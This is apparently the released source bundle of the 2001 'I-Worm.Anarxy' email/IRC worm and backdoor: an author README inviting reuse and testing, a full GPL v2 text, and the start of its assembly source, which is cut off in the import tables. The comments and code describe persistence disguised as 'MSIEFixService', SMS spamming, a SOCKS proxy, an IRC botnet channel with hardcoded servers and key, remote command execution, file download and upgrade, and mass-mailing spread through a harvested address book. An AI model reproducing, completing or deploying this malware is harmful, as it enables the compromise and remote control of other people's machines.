ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[README.TXT]ÄÄÄ First Release of I-Worm.Anarxy Feel free to use any part of this source code according to GPL license. You can modify, redistribute whatewer you want to. But don't be against GPL :) I have some thingz to code into next Release. eg HTTP proxy server, proxy servers support (under LANs) etc. Next release could be in some weeks (2 or 3). If you find any bug in the code or you could anything code better, lemme know. I'll be glad to learn anything new. I have tested it on my Win2k and some previous versions on Win9x too. Pls test if you want and lemme know whether it werx or not. I'll repair the bugz of coz and release new version. Ratter (ratter@atlas.cz) - I'm a stranger in the world I haven't made 25.1.2001; 22:38 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[README.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GPL.TXT]ÄÄÄ GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) 19yy This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) 19yy name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GPL.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ANARXY.ASM]ÄÄÄ ; I-Worm Anarxy by Ratter COMMENT~ Ok. After a long time i have decided to release my Anarxy. I don't want to talk a lot about virus ... only some thingz that are important 1. It installs itself as a Service under WinNT/2k and via registry (Run key) under Win9x 2. After run it waits for internet connection and then runs 3 threads 3. One thread is sms_thread which generates a sms number which belongs to one of Czech mobil fones providers and sends there a random sms (textz are listed below) 3. Second thread is a soxz_proxy thread - it is a soxz5 proxy which waits on [SOXZ_PORT] port for incoming connections. Done mainly for IP address hiding on irc. 4. The last thread can be a) ircbot_thread b) pop3_gateway_thread 5. Own SMTP client ... 6. Gets email addresses via The Bat! Address Boox Via Anarxy backdoor features you can manage remote machine via IRC or via Email (- done mainly for mobil fone managing support ...) Commandz avalaible are listed below ... Some of them are avalaible only under IRC version and some of them only under Email version. IRCBot Version Connectz to Undernet network and creates #iworm_anarxy_channel channel with key vx_scene. Then waits for commandz. First you must !login and after end of you're werk !logout. Email Version Tries to connect to an POP3 account. If it can't connect it tries it in one minute intervals five times. Then it runs IRCBot version. If it can connect it starts to retrieves emails and do the commands included. It retrieves messages from the end (from the newest one). Email Syntax first must be ! then are flagz (number) and then commandz separated by ";". in the end of the mail must me !end; .. eg ! 2 !info; !end will get info about machine and send it to the return-path. It won't be deleted so every 3 minutes (thats a check time for an new messages) will send this info. Then there is a EMAIL_SMS flag which says that the sender of this email was an mobil fone ... When this flag is set the reply will be devided into X parts becoz of mobil fone can't show max then XXX chars. (my mobil fone. maybe you'rse is better so don't need to do it :)) The compilation can be directed via flagz. LOG flag - log IRC sessions and SMTP ones? WORM flag - get The Bat! AB emails and send there MSIEFIX ? EMAIL flag - email version instead of irc one? DEL_EMAILZ flag - del email (wont' werk if DELETE_FORBIDDEN flag in email will be set) _SEND_NOTICE_ flag - send notice about victim? This will send an email with ip address of victim ...) The best compilation flagz: LOG off WORM on/off (worm/backdoor) EMAIL on DEL_EMAILZ on _SEND_NOTICE_ on/off (backdoor/worm) then send a email to email address Anarxy will check. sth like this ! 2 !ircbot_run; !end; it will everytime run an irc version but it will also chek new emailz to done ... (you can send files via emails - base64decode routine present - command !save_email_filez) I think i have forgotten some thingiez so go trough the code to find out more thingz ... If you want to protect you're compiled program go to http://www.suddendischarge.com/ and find you're own protector :) Ratter (ratter@atlas.cz) - I'm a stranger in the world I haven't made. Thx to Bumblebee, VirusBuster, Benny and a lotta of others ... in next release i'll name them :) i can't remember now ... Also to Psi Vojaci, KMFDM, Nine Inch Nails, P.J. Harvey, Rammstein, Iron Maden, Arakain and others ... btw before compilation change XXX strings to good ones according to you ... and also change BotPassword :) -------------------------------------------------------------------- This file is part of GnuPG. GnuPG is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. GnuPG is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA -------------------------------------------------------------------- ~ ; Disclaimer ; ---------- ; This is the source of a I-WORM. Feel free to use at your will. ; Notice that the author is not responsabile of the damages that ; may occur due to the assembly of this file. ; Textz that are sent by sms_thread ; ----------------------------------------------------------------------------- ; This mobile fone has been infected by IWORM.Anarxy by Ratter! ; ----------------------------------------------------------------------------- ; Let us arise, let us arise against the oppressors of humanity; all kings, ; emperors, presidents of republics, priests of all religions are the true ; enemies of the people; let us destroy along with them all juridical, political, ; civil and religious institutions. ; ; - Manifesto of anarchists in the Romagna, 1878 ; ----------------------------------------------------------------------------- ; I know you're real proud of this world you've built, the way it worx, all ; the nice little rules and such, but I've got some bad news. ; ; I've decided to make a few changes. ; ; Ratter - I'm a stranger in the world I haven't made. ; ----------------------------------------------------------------------------- ; I love a flower, becoz it will wither, an animal - becoz it will die; - a human ; being, becoz it will pass away and won't be, becoz it feel's it will perish ; forever; I love - I do more than love - I worship to God, becoz - he is not. ; ; - Karel Hynek Macha ; Commandz Syntax ; !login ; !quit ; !reconnect ; !logout ; !opme [] ; !redir ; !chg_pswd ; !exec ; !version ; !send ; !info ; !delete | ; !leave ; !reboot ; !email_msg "" "" ; !email_redir ; !email_file "" "" ; !email_spread ; !ls ; !sms_send "" "" ; !setup_sms ; !upgrade ; !dl_file ; !add_oper ; !remove_oper ; !list_operz ; !msg_box "" "" ; !setup_pop3 ; Email only commandz ; !save_email_filez ; !ircbot_run ; !del_emailz .586p .model flat, stdcall locals ;log equ 1 worm equ 1 ;email equ 1 ;del_emailz equ 1 ;_send_notice_ equ 1 extrn CloseHandle:PROC extrn WriteFile:PROC extrn FlushFileBuffers:PROC extrn GetModuleFileNameA:PROC extrn ExitProcess:PROC extrn WSAStartup:PROC extrn CreateFileA:PROC extrn HeapCreate:PROC extrn HeapDestroy:PROC extrn HeapAlloc:PROC extrn closesocket:PROC extrn socket:PROC extrn isalpha:PROC extrn gethostbyname:PROC extrn gethostbyaddr:PROC extrn inet_addr:PROC extrn connect:PROC extrn WSAGetLastError:PROC extrn htons:PROC extrn htonl:PROC extrn HeapFree:PROC extrn gethostname:PROC extrn send:PROC extrn recv:PROC extrn lstrcmpi:PROC extrn lstrcpy:PROC extrn lstrlen:PROC extrn GetTickCount:PROC extrn CreateThread:PROC extrn ReadFile:PROC extrn GetFileSize:PROC extrn bind:PROC extrn listen:PROC extrn select:PROC extrn accept:PROC extrn Sleep:PROC extrn inet_ntoa:PROC extrn ntohl:PROC extrn ExitThread:PROC extrn RasEnumConnectionsA:PROC extrn RasGetConnectStatusA:PROC extrn CreateMutexA:PROC extrn GetVersion:PROC extrn GetModuleHandleA:PROC extrn GetProcAddress:PROC extrn OpenMutexA:PROC extrn ExpandEnvironmentStringsA:PROC extrn ExitWindowsEx:PROC extrn CopyFileA:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn RegDeleteValueA:PROC extrn RegEnumKeyExA:PROC extrn RegDeleteKeyA:PROC extrn RegQueryValueExA:PROC extrn DeleteFileA:PROC extrn WSACleanup:PROC extrn sendto:PROC extrn WritePrivateProfileStringA:PROC extrn GetPrivateProfileStringA:PROC extrn WaitForSingleObject:PROC extrn WaitForMultipleObjects:PROC extrn TerminateThread:PROC extrn GetDateFormatA:PROC extrn lstrcatA:PROC extrn WinExec:PROC extrn GetExitCodeThread:PROC extrn GetLocalTime:PROC extrn CreateFileMappingA:PROC extrn MapViewOfFile:PROC extrn UnmapViewOfFile:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn FindClose:PROC extrn GetComputerNameA:PROC extrn GetThreadContext:PROC extrn SetThreadContext:PROC extrn GetCurrentThread:PROC extrn MessageBoxA:PROC extrn HeapReAlloc:PROC extrn InternetOpenA:PROC extrn InternetOpenUrlA:PROC extrn InternetQueryDataAvailable:PROC extrn InternetReadFile:PROC extrn InternetCloseHandle:PROC extrn GetLastError:PROC include useful.inc include win32api.inc SERVICE_TABLE_ENTRY struc STE_ServiceName dd ? STE_ServiceProc dd ? SERVICE_TABLE_ENTRY ends SERVICE_STATUS struc SS_ServiceType dd ? SS_CurrentState dd ? SS_ControlsAccepted dd ? SS_Win32ExitCode dd ? SS_ServiceSpecificExitCode dd ? SS_CheckPoint dd ? SS_WaitHint dd ? SERVICE_STATUS ends OVERLAPPED struc O_Internal dd ? O_InternalHigh dd ? O_loffset dd ? O_OffsetHigh dd ? O_hEvent dd ? OVERLAPPED ends sockaddr_in struc sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (?) sockaddr_in ends hostent struc h_name dd ? h_alias dd ? h_addr dw ? h_len dw ? h_list dd ? hostent ends timeval struc tv_sec dd ? tv_usec dd ? timeval ends fd_set struc fd_count dd ? fd_array dd ? fd_set ends RASCONNSTATUSA struc RCS_dwSize dd ? RCS_rasconnstate dd ? RCS_dwError dd ? RCS_szDeviceType db 16 + 1 dup(?) RCS_szDeviceName db 128 + 1 dup(?) RASCONNSTATUSA ends _email_ struc EM_MailFrom dd ? ; pointer to ASCIIZ EM_RcptTo dd ? ; pointer to ASCIIZ EM_Subject dd ? ; pointer to ASCIIZ EM_Message dd ? ; pointer to ASCIIZ EM_FilezNum dd ? ; number of filez; if highest bit is set ; then in EM_Filez is a *.msg file EM_Filez dd ? ; pointer to ASCIIZ pointerz _email_ ends SYSTEMTIME struc ST_Year dw ? ST_Month dw ? ST_DayOfWeek dw ? ST_Day dw ? ST_Hour dw ? ST_Minute dw ? ST_Second dw ? ST_Milliseconds dw ? SYSTEMTIME ends oper struc OP_Oper dd ? OP_Rites db ? ; 1 - RW; 0 - Ronly oper ends _temp_buffer_ struc db 200 dup(?) _temp_buffer_ ends @copy macro source local copy_end local copy_loop push esi mov esi, source copy_loop: lodsb test al, al jz copy_end stosb jmp copy_loop copy_end: pop esi endm @endsz_ macro local nxtchr push esi mov esi, edi nxtchr: lodsb test al, al jnz nxtchr xchg esi, edi pop esi endm @pushvar macro variable, empty local next_instr ifnb %out too much arguments in macro '@pushvar' .err endif call next_instr variable next_instr: endm CR_LF equ 0a0dh WAIT_TIMEOUT equ 103h SMTP_PORT equ 25 SC_MANAGER_CONNECT equ 1 SC_MANAGER_CREATE_SERVICE equ 2 DELETE equ 10000h SERVICE_AUTO_START equ 2 SERVICE_WIN32_OWN_PROCESS equ 10h SERVICE_ACCEPT_SHUTDOWN equ 4 SERVICE_CONTROL_RUN equ 0 CK_SERVICE_CONTROL equ 0 CK_PIPE equ 1 NO_ERROR equ 0 SERVICE_CONTROL_INTERROGATE equ 4 SERVICE_CONTROL_SHUTDOWN equ 5 SERVICE_STOPPED equ 1 SERVICE_START_PENDING equ 2 SERVICE_STOP_PENDING equ 3 SERVICE_RUNNING equ 4 SERVICE_CONTINUE_PENDING equ 5 SERVICE_PAUSE_PENDING equ 6 SERVICE_PAUSED equ 7 PIPE_ACCESS_OUTBOUND equ 2 PIPE_TYPE_BYTE equ 0 FILE_FLAG_OVERLAPPED equ 40000000h INFINITE equ -1 EWX_LOGOFF equ 0 EWX_REBOOT equ 2 EWX_FORCE equ 4 AF_INET equ 2 HEAP_ZERO_MEMORY equ 8 SOCK_STREAM equ 1 MAX_ALLOWED_OPERZ equ 5 SYNCHRONIZE equ 100000h RASCS_CONNECTED equ 2000h MOVEFILE_DELAY_UNTIL_REBOOT equ 4 HKEY_LOCAL_MACHINE equ 80000002h KEY_ENUMERATE_SUB_KEYS equ 8h HKEY_USERS equ 80000003h KEY_QUERY_VALUE equ 1 KEY_SET_VALUE equ 2 REG_SZ equ 1 REG_DWORD equ 4 ERROR_NO_MORE_ITEMS equ 259 INET_THREADZ_COUNT equ 3 INTERNET_OPEN_TYPE_DIRECT equ 1 POP3_PORT equ 110 OK equ "KO+" ERROR equ "" SOXZ_PORT equ 1080 EMAIL_SMS equ 1 DELETE_FORBIDDEN equ 2 .data ste SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY <0, 0> service_name db "MSIEFixService", 0 service_name_size equ $-service_name pipe_send db "IWorm.Anarxy by Ratter" pipe_send_size equ $-pipe_send SC_Manager dd ? hIOCP dd ? service_ctrl_to_pend dd SERVICE_START_PENDING dd SERVICE_STOP_PENDING dd SERVICE_PAUSE_PENDING dd SERVICE_CONTINUE_PENDING dd 0 dd SERVICE_STOP_PENDING service_pend_to_state dd 0 dd 0 dd SERVICE_RUNNING dd SERVICE_STOPPED dd 0 dd SERVICE_RUNNING dd SERVICE_PAUSED _sin_ sockaddr_in <0, 0, 0, 0> server_names dd offset server_1 dd offset server_2 dd offset server_3 dd offset server_4 dd offset server_5 dd offset server_6 dd offset server_7 dd 0 server_ports dw 6667 dw 6668 dw 6668 dw 7000 dw 6664 dw 7777 dw 6667 server_1 db "newbrunswick.nj.us.undernet.org", 0 server_2 db "graz.at.eu.undernet.org", 0 server_3 db "antwerpen.be.eu.undernet.org", 0 server_4 db "caen.fr.eu.undernet.org", 0 server_5 db "oslo.no.eu.undernet.org", 0 server_6 db "lulea.se.eu.undernet.org", 0 server_7 db "amsterdam.nl.eu.undernet.org", 0 cur_server_name dd 0 my_nick db "NICK $my_nick", 0 my_user db "USER $user_name x x :$real_name", 0 my_join db "JOIN $channel $key", 0 key_channel db "MODE $channel +sk $key", 0 invisible db "MODE $my_nick +i", 0 replacementz dd offset my_nick_ _my_nick dd offset my_nick__ dd offset user_name_ dd offset user_name__ dd offset real_name_ dd offset real_name__ dd offset channel_ channel dd offset channel__ dd offset key_ dd offset key__ dd offset dcc_file_ dcc_file dd 12345678h dd offset dcc_rcp_ dcc_rcp dd 12345678h dd offset op_who_ op_who dd 12345678h dd offset recipient_ recipient dd 12345678h dd offset privmsg_what_ privmsg_what dd 12345678h dd offset pong_reply_ pong_reply dd 12345678h dd email_message_ email_message dd offset email_message_buffer dd 0 email_message_ db "email_message", 0 my_nick_ db "my_nick", 0 user_name_ db "user_name", 0 user_name__ db "Ratter", 0 real_name_ db "real_name", 0 real_name__ db "IRCBot", 0 pong_reply_ db "pong_reply", 0 channel_ db "channel", 0 channel__ db "#iworm_anarxy_channel", 0 key_ db "key", 0 key__ db "vx_scene", 0 recipient_ db "recipient", 0 privmsg_what_ db "privmsg_what", 0 op_who_ db "op_who", 0 dcc_rcp_ db "dcc_rcp", 0 dcc_file_ db "dcc_file", 0 email_message_buffer db 5 dup(0) my_nick__ db 10 dup(0) commandz dd offset ping_command dd offset ping_fc dd offset motd_command dd offset my_join_fc dd offset motd_error dd offset my_join_fc dd offset privmsg_command dd offset privmsg_fc dd offset nick_col_error dd offset nick_error_fc dd offset error dd offset error_fc dd 0 ping_command db "PING", 0 pong_command db "PONG :$pong_reply", 0 motd_command db "375", 0 motd_error db "422", 0 privmsg_command db "PRIVMSG", 0 privmsg_msg db "PRIVMSG $recipient :$privmsg_what", 0 nick_col_error db "433", 0 op_message db "MODE $channel +o $op_who", 0 dont_ping_me db "DONT ping me", 0 dcc_send_msg db "PRIVMSG $dcc_rcp :", 01h, "DCC SEND $dcc_file " dcc_send_msg_ db 40 dup(?) error db "ERROR", 0 quit_message db "QUIT :I'm a stranger in the world I haven't made.", 0 version_message db "PRIVMSG $recipient :IWorm.Anarxy - IRCB0t&Backd00r v1.7 c0ded by Ratter", 0 bot_commandz db 6, "!login" dd offset bot_login_command db 5, "!quit" dd offset bot_quit_command db 10, "!reconnect" dd offset bot_reconnect_command db 7, "!logout" dd offset bot_logout_command db 5, "!opme" dd offset bot_opme_command db 6, "!redir" dd offset bot_redir_command db 9, "!chg_pswd" dd offset bot_chg_pswd_command db 5, "!exec" dd offset execute_command db 8, "!version" dd offset version_command db 4, "ping" dd offset ping_command_ db 5, "!send" dd offset send_command db 8, "dcc SEND" dd offset dcc_rcv_command db 5, "!info" dd offset info_command db 7, "!delete" dd offset delete_command db 6, "!leave" dd offset leave_command db 10, "!email_msg" dd offset email_msg db 12, "!email_redir" dd offset email_redir db 11, "!email_file" dd offset email_file db 13, "!email_spread" dd offset email_spread db 3, "!ls" dd offset ls_command db 9, "!sms_send" dd offset send_sms db 10, "!setup_sms" dd offset setup_sms db 8, "!upgrade" dd offset upgrade_command db 8, "!dl_file" dd offset dl_file_command db 9, "!add_oper" dd offset add_oper_command db 12, "!remove_oper" dd offset remove_oper_command db 11, "!list_operz" dd offset list_operz_command db 8, "!msg_box" dd offset msg_box_command db 11, "!setup_pop3" dd offset setup_pop3_command db 7, "!reboot" dd offset reboot_command ; Email only commandz db 17, "!save_email_filez" dd offset save_email_filez_command db 11, "!ircbot_run" dd offset ircbot_run_command db 11, "!del_emailz" dd offset del_emailz_command db 0 IFDEF log log_handle dd ? ENDIF heap_handle dd ? buffer dd ? in_buffer dd ? str_buffer dd ? temp_buffer dd ? socket_handle dd ? local_host_ip dd ? bytes_read dd ? cur_in_buffer dd ? oper_buffer dd ? msg_from dd ? msg_command dd ? msg_to dd ? msg_paramz dd ? to_flag dd ? syn_flag dd ? all_iz_ok db "!Ok", 0 error_ db "!Error", 0 bot_password dd 0392a4613h operz dd 0 oper MAX_ALLOWED_OPERZ dup(<>) dd -1 online_flag dd 0 fc_import db "kernel32.dll", 0 dd 7 db "CreateNamedPipeA", 0 CreateNamedPipeA dd ? db "ConnectNamedPipe", 0 ConnectNamedPipe dd ? db "DisconnectNamedPipe", 0 DisconnectNamedPipe dd ? db "PostQueuedCompletionStatus", 0 PostQueuedCompletionStatus dd ? db "CreateIoCompletionPort", 0 CreateIoCompletionPort dd ? db "GetQueuedCompletionStatus", 0 GetQueuedCompletionStatus dd ? db "MoveFileExA", 0 MoveFileExA dd ? db "advapi32.dll", 0 dd 8 db "OpenSCManagerA", 0 OpenSCManagerA dd ? db "StartServiceCtrlDispatcherA", 0 StartServiceCtrlDispatcherA dd ? db "OpenServiceA", 0 OpenServiceA dd ? db "CloseServiceHandle", 0 CloseServiceHandle dd ? db "CreateServiceA", 0 CreateServiceA dd ? db "DeleteService", 0 DeleteService dd ? db "RegisterServiceCtrlHandlerA", 0 